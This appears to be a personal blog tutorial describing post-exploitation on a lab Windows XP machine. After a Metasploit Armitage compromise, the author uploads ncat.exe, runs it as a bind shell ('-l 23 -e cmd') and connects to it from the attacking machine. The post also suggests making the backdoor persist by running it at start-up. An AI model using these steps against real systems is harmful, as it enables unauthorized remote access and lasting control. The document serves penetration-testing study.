First I exploited my Windows system with Metasploit Armitage obtaining a Meterpreter shell as per this post.
Then I needed to upload the ncat.exe file (which I download from here) to the target machine. In Armitage this is a breeze. Simply right-click the compromised terminal: >> Meterpreter1 >> Explore >> Browse Files. This give you a nice list of files on the exploited machine:
Notice the “Upload” button from which we transfer files over on to the target system. Once complete you can refresh and check your file is indeed within the C:\WINDOWS\system32 directory. Once found right-click the file and “Execute” which brings up the “Input Arguments” box:
As you can see I entered -l (listen) 23 (port) -e (execute) cmd (command shell)
I then opened a Terminal on the attacking machine and attempted to connect with Ncat on the the target machine:
~# ncat 192.168.1.79 23 <– Input target IP and specified port
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.C:\WINDOWS\system32>
And as you can see this connection was successful. I can now close Metasploit and continue with this connection.
It’s worth noting that the -e command has an implicit “keep alive” element which means that Ncat stays up and running even after the connection is terminated.
It’s also worth noting that this is a non-persistent connection in that once the target machine is rebooted the connection is no longer available without executing the Ncat listener. This can be overcome through ensuring the Ncat.exe program is executed on start-up.
I’ll try to blog the solution to this and also create a reverse connection.